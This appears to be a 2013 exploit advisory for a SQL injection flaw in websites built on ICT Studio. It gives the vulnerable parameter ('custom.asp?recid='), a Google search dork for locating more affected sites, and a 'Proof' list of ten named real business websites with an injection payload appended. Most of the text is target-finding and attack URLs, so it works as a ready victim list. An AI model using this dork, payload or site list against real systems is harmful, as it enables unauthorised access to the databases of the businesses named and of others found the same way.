Sites powered by ICT Studio suffer from a remote SQL injection vulnerability. Note that this advisory has site-specific information.
c47882abc7900650c6b65b029ecf19453bd77e4daa8475006de46e9acdc95834
#**************************************************************
# [+] Exploit title : ICT Studio Sql injection vulnerability
#
# [+] Software link : http://www.ictstudio.ie
#
# [+] Exploit Author : Ashiyane Digital Security Team
#
# [+] Tested on: Windows 7 , Linux
#
# [+] Google Dork : intext:"Powered by ICT Studio"
#
# [+] Date: 2013/09/11
#
--------------------------------------------------------------------
# [+] Exploit : Sql Injection
#
# [+] Location : [Target]/web/custom.asp?recid=[Sql injection]
#
#-------
# Proof:
#-------
#
# http://www.assisidesign.com/web/custom.asp?recid=1'
#
# http://www.bunratty.net/web/custom.asp?recid=1'
#
# http://www.biocapcro.com//web/custom.asp?recid=1'
#
# http://www.frank-regan.ie/web/custom.asp?recid=1'
#
# http://www.jbbourkeheating.ie/web/custom.asp?recid=1'
#
# http://www.limerickshow.com/web/custom.asp?recid=1'
#
# http://www.vizepropertygroup.com/web/custom.asp?recid=1'
#
# http://www.muddyburns.com/web/custom.asp?recid=1'
#
# http://www.merlon.ie/web/custom.asp?recid=1'
#
# http://www.paneuro.ie/web/custom.asp?recid=1'
#
#
######################
discovered by : ACC3SS
######################